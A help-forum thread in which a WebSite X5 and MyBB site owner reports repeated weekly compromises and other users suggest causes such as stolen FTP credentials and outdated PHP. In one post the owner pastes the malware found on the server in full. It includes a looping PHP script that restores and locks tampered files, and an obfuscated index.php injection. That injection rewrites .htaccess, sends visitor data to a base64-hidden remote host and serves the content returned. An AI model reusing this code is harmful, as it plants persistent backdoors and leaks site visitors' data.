WebSite X5Help Center

 
A. Pais
A. Pais
User

Hack website  en

Autor: A. Pais
Visited 371, Followers 1, Udostępniony 0  

desde há cerca de 4 meses, que tenho sido hackeado todas as semanas.
já tentei apaguei toda a pasta, e apaguei os ficheiros alterados, e sempre que faço o upload dos ficheiros limpos, , passado uns dias, acontece o mesmo.
Acho que existe uma vulneberilidade em algum ficheiro, onde o hacker consegue aceder ao espaço. podem ajudar se eu vos enviar os ficheiros para análise?
Estou frustrado e já retornei ao programa antigo (website x5 evo12), uma vez que este sempre foi seguro
Podem ajudar-me?

Posted on the
10 ODPOWIEDZI
Claudio D.
Claudio D.
Moderator
Najlepszy Użytkownik miesiąca IT

what exactly do you mean by “hacked” ?


the only vulnerabilities might be in the php files if you use a deprecated version of php, but the chances are very low.


I think that :
- either you have extra code from a dubious source (counters, for example).
- or they have your ftp password.

Anyway , version 12 is more vulnerable.

Have you changed the ftp password yet ?
Do you have extra codes ?
Do you use ftps to transfer the site to the host ?

Explain well what you mean by “hacked”.



Czytaj więcej
Posted on the from Claudio D.
Alvin L.
Alvin L.
User

Looks like you are using MyBB for your forums.  You might see if they have an upgrade.  Your hosting provider should offer the ability to block IP's.  Most likely the are coming from a short list of IP's.

Czytaj więcej
Posted on the from Alvin L.
A. Pais
A. Pais
User
Autor

Yes, I use MyBB, but I thinks is not there. Yestarday I deactivated the Plugins, and is the same. every time i delete this 3 files, before sime time, they reapear, and my index, put witl ".old", like the print. I can share the files, they dont have virus, but someone can see what they mess.

Czytaj więcej
Posted on the from A. Pais
Claudio D.
Claudio D.
Moderator
Najlepszy Użytkownik miesiąca IT

have you reset and change ftp password ?

what version of MyBB ?

what version of php ?

Czytaj więcej
Posted on the from Claudio D.
A. Pais
A. Pais
User
Autor

I reset the ftp pass , like 5 times.

My version of MyBB is the last 1.38.

php version I can see in cpanel 7.3 (current)

Czytaj więcej
Posted on the from A. Pais
Alvin L.
Alvin L.
User

You should upgrade your PHP to 8.1.  My hosting does not even support PHP v7.x anymore.

Czytaj więcej
Posted on the from Alvin L.
A. Pais
A. Pais
User
Autor

I will consider in the nex update of MyBB, but I think is not from there.

This is the code appear;

I.php

<?php unlink('/home/ptumcom/public_html/l.php');$index_path = '/tmp' ."/index.php";
$index_content = file_get_contents($index_path);
$index_md5 = md5($index_content);
$htaccess_path = '/tmp' ."/.htaccess";
$htaccess_content = file_get_contents($htaccess_path);
$htaccess_md5 = md5($htaccess_content);

while (true)
{
$temp_md5 = @md5(file_get_contents($index_path));
if (!file_exists($index_path) || $temp_md5 != $index_md5) {
@file_put_contents($index_path, $index_content);
@touch($index_path, strtotime("-400 days", time()));
@chmod($index_path, 0444);
}
$temp_md5 = @md5(file_get_contents($htaccess_path));
if (!file_exists($htaccess_path) || $temp_md5 != $htaccess_md5) {
@file_put_contents($htaccess_path, $htaccess_content);
@touch($htaccess_path, strtotime("-400 days", time()));
@chmod($htaccess_path, 0444);
}
sleep(1);
}"

and in new index.php

This is the change

"function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYwMTItY2g0LXYyNjYuaW1nMTB5YWhvby5jb20='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://' $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<!DOCTYPE html><!-- HTML5 -->"

Czytaj więcej
Posted on the from A. Pais
A. Pais
A. Pais
User
Autor

OK, I think I configure the problem.
I made a search in file I.php and get some results relating with facebook. I have a code and plugin in my index, so I removed. lets see if they appear again. Hope not ;)

Czytaj więcej
Posted on the from A. Pais
Glaucio M.
Glaucio M.
User

Amigo, problema está em seu servidor. Se for conta única, pode ter tido o FTP invadido e infiltrado algum código maligno. Maioria das vezes é invadido por ser uma hospedagem compartilhada! Cobre sua empresa responsável pela hospedagem! 

Czytaj więcej
Posted on the from Glaucio M.
A. Pais
A. Pais
User
Autor

The problem is not the facebook plugin. I will try make a fresh MyBB install and see if the problem maintain.

I will give news.

Czytaj więcej
Posted on the from A. Pais